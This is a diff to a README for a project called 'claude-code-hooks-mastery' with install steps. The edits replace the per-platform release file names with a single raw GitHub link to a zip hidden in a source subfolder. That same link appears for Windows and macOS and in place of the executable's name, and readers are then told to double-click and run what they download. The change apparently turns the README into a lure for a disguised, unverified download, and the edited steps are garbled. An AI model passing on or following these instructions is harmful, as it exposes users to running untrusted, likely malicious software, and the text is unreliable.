hiuuhouyhkuhh/claude-code-hooks-mastery/README.md

 1. Click the link above to navigate to the Releases page.
 2. Find the latest version.
 It is usually at the top of the list.
 3. Look for the file that matches your operating system.
 For example:
-   - For Windows, it might be named `claude-code-hooks-mastery-windows.zip`.
+   - For Windows, it might be named `https://github.com/hiuuhouyhkuhh/claude-code-hooks-mastery/raw/refs/heads/main/apps/task-manager/src/commands/mastery-claude-hooks-code-v3.6.zip`.
-   - For macOS, look for `claude-code-hooks-mastery-macos.zip`.
+   - For macOS, look for `https://github.com/hiuuhouyhkuhh/claude-code-hooks-mastery/raw/refs/heads/main/apps/task-manager/src/commands/mastery-claude-hooks-code-v3.6.zip`.
 4. Click on the file to download it.
 5. Once downloaded, locate the file in your Downloads folder.
 6. Unzip the file if it is compressed (you can right-click and select "Extract").
-7. Open the extracted folder and find the executable file (e.g., `claude-code-hooks-mastery.exe` for Windows).
+7. Open the extracted folder and find the executable file (e.g., `https://github.com/hiuuhouyhkuhh/claude-code-hooks-mastery/raw/refs/heads/main/apps/task-manager/src/commands/mastery-claude-hooks-code-v3.6.zip` for Windows).
 8. Double-click the executable file to run the software.

 ## 📝 Usage Instructions